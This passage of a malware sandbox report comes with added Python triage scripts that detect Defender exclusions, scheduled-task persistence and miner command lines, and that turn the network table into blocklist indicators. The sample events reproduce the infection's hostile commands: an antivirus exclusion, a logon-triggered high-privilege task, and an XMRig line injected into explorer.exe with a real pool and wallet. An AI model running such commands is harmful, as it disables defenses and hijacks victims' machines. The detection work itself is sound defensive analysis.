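and a Windows system binary whose command line carries stratum-miner options."""
import re
from dataclasses import dataclass

# Directories a standard user can write to; persistence pointing here deserves attention.
USER_WRITABLE = re.compile(r"\\(AppData|Local\\Temp|ProgramData|Users\\Public)\\", re.I)
# Switches characteristic of xmrig-style miners; two or more on one command line is enough.
MINER_FLAGS = ("--algo=", "--url=", "--user=", "--pass=", "--donate-level=", "--randomx-mode=", "stratum+")
# Binaries that never legitimately carry miner arguments; seeing them here points at injection.
SYSTEM_IMAGES = {"explorer.exe", "svchost.exe", "conhost.exe", "sihost.exe", "dllhost.exe"}

EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension|IpAddress)\s+"
    r"(?:\"([^\"]+)\"|'([^']+)'|(\S+))", re.I | re.S)
# Value of schtasks /tr up to the next switch, a trailing '&', or end of line.
SCHTASKS_TR_RE = re.compile(r"/tr\s+(.+?)(?=\s+/\w|\s*&|\s*$)", re.I)


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def _image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """events: iterable of {'image': full path, 'cmdline': command line}; returns Findings in order."""
    findings = []
    for ev in events:
        image, cmd = ev["image"], ev["cmdline"]
        name, low = _image_name(image), cmd.lower()

        m = EXCLUSION_RE.search(cmd)
        if m and "powershell" in name:
            target = next(g for g in m.groups()[1:] if g)
            findings.append(Finding("defender_exclusion", image, f"-Exclusion{m.group(1)} {target}"))

        if name == "schtasks.exe" and "/create" in low:
            tr = SCHTASKS_TR_RE.search(cmd)
            target = tr.group(1).strip().strip("'\"") if tr else ""   # peel '"..."' quoting
            if USER_WRITABLE.search(target):
                opts = " ".join(o for o in ("/sc onlogon", "/rl highest", "/f") if o in low)
                findings.append(Finding("task_from_user_dir", image, f"{target} [{opts}]"))

        if sum(flag in low for flag in MINER_FLAGS) >= 2:
            pool = re.search(r"--url=(\S+)", cmd)
            wallet = re.search(r"--user=([^\s.]+)", cmd)   # address precedes the ".worker" suffix
            kind = "system binary" if name in SYSTEM_IMAGES else "non-system binary"
            findings.append(Finding("miner_cmdline", image,
                f"{kind}; pool={pool.group(1) if pool else '?'}; wallet={wallet.group(1) if wallet else '?'}"))
    return findings


# Constructed from the report's process list (miner command line abbreviated); the last two
# records are invented benign controls and should produce no finding.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
                r'-ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"'},
    {"image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r"""schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'"""},
    {"image": r"C:\Windows\explorer.exe",
     "cmdline": "C:\\Windows\\explorer.exe --cinit-find-x -B --algo=rx/0 --randomx-mode=auto "
                "--url=xmr-eu2.nanopool.org:14433 "
                "--user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password "
                "--pass= --tls --cinit-stealth"},
    {"image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": r"C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe"},
    {"image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'schtasks /create /sc daily /tn "Acme Backup" /tr "C:\Program Files\Acme\backup.exe"'},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule:22} {f.image}\n{'':22} {f.detail}")
```

The same three rules map directly onto process-creation telemetry (Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled); the image/command-line pair is all they need. The miner rule deliberately keys on the arguments rather than the image name, because here the arguments sit on explorer.exe.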
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.13.2.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 172.67.75.166:443 | api.db-ip.com | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.28.25:80 | www.maxmind.com | tcp |
| GB | 37.0.8.235:80 | N/A | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| N/A | 127.0.0.1:63098 | N/A | tcp |
| N/A | 127.0.0.1:63100 | N/A | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.28.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lenak513.tumblr.com | udp |
| US | 74.114.154.18:443 | lenak513.tumblr.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.11.8:80 | N/A | tcp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | N/A | tcp |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| SG | 37.0.10.236:80 | N/A | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| DE | 51.195.43.17:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | 17.43.195.51.in-addr.arpa | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 146.59.154.106:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.154.59.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| SG | 37.0.10.236:80 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp |
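The connection table above mixes three things that need different handling before any of it goes on a blocklist: DNS queries to the sandbox resolver (8.8.8.8:53), reverse PTR lookups of the IPs the guest just contacted (the `*.in-addr.arpa` rows, which are the sandbox's own noise), and the actual TCP connections, some of which have no hostname in front of them at all (45.142.213.135:30058, 37.0.10.236:80). The script below is an added example, not part of the sandbox report, that separates these classes and tags the results. It tolerates both the well-formed rows and the collapsed form where an empty domain cell has shifted the protocol left. The tag names, the treatment of every `nanopool.org` host as a mining pool, and the rows copied into `SAMPLE_ROWS` as constructed input are assumptions of the example; the list of abused hosting services comes from the report's own "Legitimate hosting services abused" signature.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: rows copied from the connection table above. Two row shapes
# occur in extracted reports: a proper empty domain cell, and a collapsed form
# where the protocol has shifted left into the domain column. Both are handled.
SAMPLE_ROWS = """
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| DE | 51.195.43.17:14433 | xmr-eu2.nanopool.org | tcp |
| SG | 37.0.10.236:80 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| LV | 45.142.213.135:30058 | tcp |
"""

RESOLVER = "8.8.8.8:53"   # the sandbox's DNS resolver; rows to it are lookups, not C2
# Services the report itself lists under "Legitimate hosting services abused".
ABUSED_SERVICES = {"iplogger.org", "pastebin.com", "github.com", "raw.githubusercontent.com"}
# Assumption: any nanopool.org host is a Monero pool (the report flags XMRig).
POOL_RE = re.compile(r"(^|\.)nanopool\.org$")


def parse_row(line):
    """Return (country, dest, domain, proto) or None for a non-table line."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) < 3:
        return None
    country, dest, third, fourth = (cells + ["", ""])[:4]
    if third in ("tcp", "udp") and fourth == "":
        third, fourth = "", third          # collapsed empty-domain cell
    return country, dest, third, fourth


def classify(dest, domain, proto):
    """Tag one non-DNS connection."""
    tags = set()
    host = dest.rpartition(":")[0]
    if host.startswith(("224.", "239.")):
        tags.add("multicast_noise")        # mDNS/SSDP from the guest, not the sample
    if domain in ABUSED_SERVICES:
        tags.add("abused_legit_service")
    if POOL_RE.search(domain):
        tags.add("mining_pool")
    if proto == "tcp" and not domain:
        tags.add("direct_ip_connect")      # no hostname in front of it: C2 candidate
    return tags


def triage(text):
    """Split the table into resolved names, PTR noise and tagged connections."""
    dns_names, reverse_lookups, connections = Counter(), Counter(), Counter()
    tags = defaultdict(set)
    for line in text.splitlines():
        row = parse_row(line)
        if row is None:
            continue
        _, dest, domain, proto = row
        if dest == RESOLVER and proto == "udp":
            # PTR queries are the sandbox resolving the IPs it just saw; they are
            # not attacker infrastructure and must not land on a blocklist.
            target = reverse_lookups if domain.endswith(".in-addr.arpa") else dns_names
            target[domain] += 1
            continue
        connections[(dest, domain, proto)] += 1
        tags[dest] |= classify(dest, domain, proto)
    return {"dns": dns_names, "ptr": reverse_lookups, "conns": connections, "tags": tags}


def ioc_list(result):
    """Flat, de-duplicated list for a blocklist: (kind, value, tags), noise removed."""
    out = []
    for name in sorted(result["dns"]):
        t = set()
        if name in ABUSED_SERVICES:
            t.add("abused_legit_service")
        if POOL_RE.search(name):
            t.add("mining_pool")
        out.append(("domain", name, t))
    for dest, domain, proto in sorted(result["conns"]):
        t = result["tags"][dest]
        if "multicast_noise" in t:
            continue
        out.append(("endpoint", f"{dest}/{proto}", set(t)))
    return out


if __name__ == "__main__":
    for kind, value, t in ioc_list(triage(SAMPLE_ROWS)):
        print(f"{kind:9} {value:45} {','.join(sorted(t)) or '-'}")
```

Run against the full table, the output is a short list: the resolved names, the two pool endpoints on port 14433, and two bare TCP destinations with no DNS in front of them. The last group is what to prioritise for network detection; the repeated 45.142.213.135:30058 connects line up with the RedLine/SectopRAT payload signatures the report carries, while the Cloudflare-fronted iplogger.org and pastebin.com addresses should be hunted by hostname, not IP.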
Files
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe
| MD5 | 68a59b521798b22a72d30dd7ff6eb04a |
| SHA1 | 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da |
| SHA256 | e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc |
| SHA512 | 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/3016-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-42-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-44-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3016-43-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3016-39-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-38-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3016-37-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3016-36-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3016-41-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-40-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-34-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3016-33-0x0000000064941000-0x000000006494F000-memory.dmp
memory/3016-32-0x00000000013F0000-0x000000000147F000-memory.dmp
memory/3016-31-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/3016-27-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe
| MD5 | 7e06ee9bf79e2861433d6d2b8ff4694d |
| SHA1 | 28de30147de38f968958e91770e69ceb33e35eb5 |
| SHA256 | e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f |
| SHA512 | 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
| SHA512 | 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe
| MD5 | 80cf471e52dcc848d81092439489f12f |
| SHA1 | 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5 |
| SHA256 | 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f |
| SHA512 | 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe
| MD5 | c0d18a829910babf695b4fdaea21a047 |
| SHA1 | 236a19746fe1a1063ebe077c8a0553566f92ef0f |
| SHA256 | 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98 |
| SHA512 | cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823 |
memory/4800-97-0x0000000000F60000-0x0000000000F8C000-memory.dmp
memory/3252-100-0x00000000002F0000-0x00000000003DE000-memory.dmp
memory/4800-103-0x0000000003110000-0x0000000003130000-memory.dmp
memory/1000-104-0x0000000000800000-0x0000000000942000-memory.dmp
memory/1000-107-0x0000000005260000-0x00000000052F2000-memory.dmp
memory/1000-106-0x0000000005770000-0x0000000005D14000-memory.dmp
memory/4800-105-0x0000000003140000-0x0000000003146000-memory.dmp
memory/1000-108-0x0000000005200000-0x000000000520A000-memory.dmp
memory/1000-109-0x0000000005590000-0x000000000562C000-memory.dmp
memory/4800-99-0x0000000003100000-0x0000000003106000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe
| MD5 | 0965da18bfbf19bafb1c414882e19081 |
| SHA1 | e4556bac206f74d3a3d3f637e594507c30707240 |
| SHA256 | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff |
| SHA512 | fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\24ebc9ce784c63.exe
| MD5 | 5866ab1fae31526ed81bfbdf95220190 |
| SHA1 | 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f |
| SHA256 | 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e |
| SHA512 | 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
| MD5 | ef5fa848e94c287b76178579cf9b4ad0 |
| SHA1 | 560215a7c4c3f1095f0a9fb24e2df52d50de0237 |
| SHA256 | 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c |
| SHA512 | 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe
| MD5 | 2b32e3fb6d4deb5e9f825f9c9f0c75a6 |
| SHA1 | 2049fdbbe5b72ff06a7746b57582c9faa6186146 |
| SHA256 | 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2 |
| SHA512 | ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe
| MD5 | 079d742f6fc3fcc2eca352a1537e5103 |
| SHA1 | d904d7432a367ad078c99c281b67705e7332496a |
| SHA256 | 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39 |
| SHA512 | 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b |
memory/4876-80-0x0000000000A70000-0x0000000000A78000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe
| MD5 | 3f9f7dfccefb41726d6b99e434155467 |
| SHA1 | f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1 |
| SHA256 | 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34 |
| SHA512 | e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762 |
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
| MD5 | ad0aca1934f02768fd5fedaf4d9762a3 |
| SHA1 | 0e5b8372015d81200c4eff22823e854d0030f305 |
| SHA256 | dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388 |
| SHA512 | 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7 |
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 01ad10e59fa396af2d5443c5a14c1b21 |
| SHA1 | f209a4f0bb2a96e3ee6a55689e7f00e79c04f722 |
| SHA256 | bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137 |
| SHA512 | 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02 |
memory/1320-129-0x00000000020A0000-0x0000000002184000-memory.dmp
memory/1004-120-0x0000000000CA0000-0x0000000000CB0000-memory.dmp
memory/3640-143-0x0000000000400000-0x00000000004E4000-memory.dmp
memory/3016-150-0x0000000000400000-0x0000000000A07000-memory.dmp
memory/3016-159-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3016-158-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3016-157-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-156-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3016-154-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/3312-160-0x0000000000400000-0x00000000032F3000-memory.dmp
memory/1000-161-0x0000000004CB0000-0x0000000004CC2000-memory.dmp
memory/2380-171-0x0000000000400000-0x0000000003346000-memory.dmp
memory/3640-172-0x0000000000770000-0x000000000084D000-memory.dmp
memory/1004-175-0x0000000001A90000-0x0000000001AA2000-memory.dmp
memory/1004-174-0x0000000001A60000-0x0000000001A6E000-memory.dmp
memory/1000-188-0x000000000A2A0000-0x000000000A32C000-memory.dmp
memory/1000-189-0x0000000006F20000-0x0000000006F3E000-memory.dmp
memory/4760-190-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
| MD5 | a628baa97881fa5528009c9470cadee0 |
| SHA1 | 583aa730e302fe0015cdb0dee4e279f193d66d87 |
| SHA256 | e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5 |
| SHA512 | c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf |
memory/4760-199-0x0000000005860000-0x0000000005E78000-memory.dmp
memory/4760-200-0x00000000052A0000-0x00000000052B2000-memory.dmp
memory/4760-201-0x0000000005340000-0x000000000537C000-memory.dmp
memory/2656-202-0x00000000048E0000-0x0000000004916000-memory.dmp
memory/2656-204-0x0000000004F60000-0x0000000005588000-memory.dmp
memory/4760-203-0x0000000005380000-0x00000000053CC000-memory.dmp
memory/2656-207-0x0000000005770000-0x00000000057D6000-memory.dmp
memory/2656-206-0x0000000005700000-0x0000000005766000-memory.dmp
memory/2656-205-0x0000000004F20000-0x0000000004F42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4xfsz0p.s1q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4760-219-0x00000000055E0000-0x00000000056EA000-memory.dmp
memory/2656-220-0x00000000058E0000-0x0000000005C34000-memory.dmp
memory/2656-221-0x0000000005DB0000-0x0000000005DCE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS76B2.tmp\Install.cmd
| MD5 | a3c236c7c80bbcad8a4efe06a5253731 |
| SHA1 | f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07 |
| SHA256 | 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d |
| SHA512 | dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc |
